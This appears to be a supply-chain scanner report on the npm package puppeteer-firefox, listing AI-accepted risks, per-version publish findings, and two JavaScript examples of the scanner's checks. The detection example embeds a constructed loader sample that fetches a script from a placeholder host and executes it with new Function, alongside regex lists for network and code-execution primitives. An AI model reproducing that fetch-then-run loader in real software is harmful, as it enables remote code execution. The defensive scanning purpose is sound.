puppeteer-firefox
Puppeteer API for Firefox
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:lib/JSHandle.js | AI (source-diff): JSHandle.js is core browser automation code for puppeteer-firefox. Network calls and dynamic code execution are expected in a browser automation library communicating with Firefox via DevTools Protocol. | ai | |
| source-diff | large-new-source-files | AI (source-diff): puppeteer-firefox is an actively developed experimental package; adding many source files across versions is expected as the library grows to match Puppeteer's API surface. | ai | |
| semgrep | semgrep:child-process-spawn | AI (semgrep): Spawning Firefox is the primary purpose of this browser automation library; child_process.spawn is expected and necessary. | ai | |
| semgrep | semgrep:child-process-import | AI (semgrep): child_process import is required to launch Firefox — core functionality of a browser launcher package. | ai | |
| install-scripts | install-script:install | AI (install-scripts): puppeteer-firefox's install script downloads a pinned Firefox binary — this is the documented, expected install flow identical to puppeteer's own pattern. | ai | |
| semgrep | semgrep:base64-decode | AI (semgrep): Base64 decoding in NetworkManager.js handles browser protocol response bodies — standard CDP/RDP network interception. | ai | |
| semgrep | semgrep:api-obfuscation-reflect | AI (semgrep): Reflect.get() in helper.js is used for async stack hook installation — legitimate introspection, not obfuscation. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): new Function() in DOMWorld.js is used for page predicate evaluation — standard Puppeteer internals for waitFor* APIs. | ai | |
| semgrep | semgrep:http-module-request | AI (semgrep): HTTP requests in BrowserFetcher.js are used to download the Firefox binary during install — core functionality, not exfiltration. | ai | |
v0.5.1
4 findings
Install script: node install.js
This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: mathias.
This version was published on 2020-01-09 by a different npm account (mathias) than previous versions (aslushnikov). This could indicate a legitimate maintainer transition or an account compromise.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.5.0
3 findings
This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: aslushnikov.
A file newly added in this version contains both network calls and dynamic code execution, the fetch-then-run shape that is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
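The net-exec finding above, and the accepted risk for lib/JSHandle.js in the table, both come from a rule of the following shape. This is an added example and not the scanner's actual rule or any puppeteer-firefox code: the pattern lists are illustrative assumptions, and the three sample files are constructed. It shows why a benign automation module (browser transport plus compiled predicates) trips the same heuristic as a loader, and why the rule looks only at files that are new in a version.

```javascript
// Added example (not the scanner's rule or puppeteer-firefox code): a
// minimal "net-exec-file" heuristic. A file newly added in a version is
// flagged when it contains BOTH a network call and a dynamic-code-execution
// primitive, the fetch-then-run shape of a dropper/loader. The pattern lists
// are illustrative assumptions, not the real scanner's rule set.
const NET_PATTERNS = [
  /\bfetch\s*\(/,
  /\brequire\s*\(\s*['"](?:https?|net|tls|dns)['"]\s*\)/,
  /\bhttps?\.(?:request|get)\s*\(/,
  /\bnet\.(?:connect|createConnection)\s*\(/,
  /\bnew\s+WebSocket\s*\(/,
];
const EXEC_PATTERNS = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\bvm\.(?:runInContext|runInNewContext|runInThisContext|compileFunction)\s*\(/,
];

function matching(patterns, source) {
  return patterns.filter((re) => re.test(source)).map((re) => re.source);
}

// Scan one file; both lists must hit for the file to be flagged.
function scanFile(path, source) {
  const net = matching(NET_PATTERNS, source);
  const exec = matching(EXEC_PATTERNS, source);
  return { path, net, exec, flagged: net.length > 0 && exec.length > 0 };
}

// Diff-aware wrapper: prevFiles/nextFiles map path -> source for the two
// tarballs. Only paths absent from the previous version are examined,
// matching the "newly added file" wording of the finding.
function netExecFindings(prevFiles, nextFiles) {
  return Object.entries(nextFiles)
    .filter(([path]) => !(path in prevFiles))
    .map(([path, source]) => scanFile(path, source))
    .filter((r) => r.flagged);
}

// --- constructed sample inputs (not real package contents) ---
// Loader shape: fetch a second stage over HTTPS, then execute it.
const DROPPER = `
const https = require('https');
https.get('https://example.invalid/stage2.js', (res) => {
  let body = '';
  res.on('data', (d) => (body += d));
  res.on('end', () => new Function(body)());
});
`;

// Stand-in for automation code: speaks to a browser over a WebSocket and
// compiles caller-supplied predicates with new Function. It trips the same
// heuristic, which is why a reviewer has to read it and accept or reject.
const AUTOMATION = `
class Session {
  constructor(url) { this.ws = new WebSocket(url); }
  evaluate(predicateSource) {
    const fn = new Function('return (' + predicateSource + ')');
    return this.send('Runtime.evaluate', { expression: String(fn()) });
  }
}
`;

// Neither network nor dynamic execution: never flagged.
const UTIL = `
function sleep(ms) { return new Promise((r) => setTimeout(r, ms)); }
module.exports = { sleep };
`;

const findings = netExecFindings(
  { 'lib/util.js': UTIL },
  { 'lib/util.js': UTIL, 'lib/loader.js': DROPPER, 'lib/Session.js': AUTOMATION },
);
for (const f of findings) {
  console.log(`${f.path}: net=[${f.net.join(', ')}] exec=[${f.exec.join(', ')}]`);
}
```

Because the rule cannot distinguish the two flagged files, the decision has to be recorded as an accepted risk with a reason, as the table above does, rather than by weakening the rule.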
v0.4.1
2 findings
This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: aslushnikov.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
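The provenance status at the top of the page and the per-version findings (missing gitHead, publisher change, no Sigstore provenance, install script) are all derivable from the registry's own metadata. The following is an added example, not the scanner's code: it reproduces those checks over a packument whose field names are the ones the public npm registry returns, while the packument itself is constructed for a hypothetical package rather than real puppeteer-firefox metadata.

```javascript
// Added example (not the scanner's code): reproduce the publish-metadata
// checks reported on this page from an npm registry packument. The field
// names (versions[v].gitHead, versions[v]._npmUser, versions[v].scripts,
// versions[v].dist.attestations, the top-level time map) are the ones the
// public npm registry returns; the packument below is constructed for a
// hypothetical package, not real puppeteer-firefox metadata.
const PACKUMENT = {
  name: 'example-automation',
  time: {
    created: '2019-10-01T00:00:00.000Z',
    '1.0.0': '2019-10-01T00:00:00.000Z',
    '1.0.1': '2019-11-15T00:00:00.000Z',
    '1.1.0': '2019-12-20T00:00:00.000Z',
    '1.1.1': '2020-02-03T00:00:00.000Z',
    modified: '2020-02-03T00:00:00.000Z',
  },
  versions: {
    '1.0.0': { gitHead: '0123456789abcdef0123456789abcdef01234567', _npmUser: { name: 'alice' }, dist: {} },
    '1.0.1': { _npmUser: { name: 'alice' }, dist: {} },
    '1.1.0': { _npmUser: { name: 'alice' }, dist: {} },
    '1.1.1': { _npmUser: { name: 'bob' }, scripts: { install: 'node install.js' }, dist: {} },
  },
};

// Versions in publish order, taken from the registry's time map (which also
// holds "created" and "modified", hence the walk over versions instead).
function publishedVersions(pkg) {
  return Object.keys(pkg.versions).sort(
    (a, b) => Date.parse(pkg.time[a]) - Date.parse(pkg.time[b]),
  );
}

// Sigstore/SLSA provenance appears as dist.attestations.provenance with a
// predicateType; its absence is the "published without provenance" finding.
function hasProvenance(v) {
  const att = v.dist && v.dist.attestations;
  return Boolean(att && att.provenance && att.provenance.predicateType);
}

function auditPublishes(pkg) {
  const findings = [];
  let seenGitHead = false;
  let prevUser = null;
  for (const ver of publishedVersions(pkg)) {
    const v = pkg.versions[ver];
    const user = v._npmUser ? v._npmUser.name : 'unknown';
    const day = pkg.time[ver].slice(0, 10);
    // gitHead disappearing after earlier versions carried it suggests the
    // publish environment changed (no git checkout, different tooling,
    // or a manual publish from elsewhere).
    if (v.gitHead) seenGitHead = true;
    else if (seenGitHead) findings.push({ version: ver, rule: 'missing-githead', detail: `no gitHead; published by ${user}` });
    if (prevUser !== null && user !== prevUser) {
      findings.push({ version: ver, rule: 'publisher-changed', detail: `${prevUser} -> ${user} on ${day}` });
    }
    if (!hasProvenance(v)) findings.push({ version: ver, rule: 'no-provenance', detail: 'no dist.attestations.provenance' });
    for (const hook of ['preinstall', 'install', 'postinstall']) {
      if (v.scripts && v.scripts[hook]) {
        findings.push({ version: ver, rule: 'install-script', detail: `${hook}: ${v.scripts[hook]}` });
      }
    }
    prevUser = user;
  }
  return findings;
}

function rulesFor(findings, version) {
  return findings.filter((f) => f.version === version).map((f) => f.rule).sort();
}

const all = auditPublishes(PACKUMENT);
for (const ver of publishedVersions(PACKUMENT)) {
  const rules = rulesFor(all, ver);
  console.log(`v${ver}: ${rules.length} findings (${rules.join(', ')})`);
}
```

For a real package the same document is the JSON served at `https://registry.npmjs.org/<name>`; a version that was published with provenance carries `dist.attestations` there, and that is the field to check before trusting a tarball whose gitHead is absent.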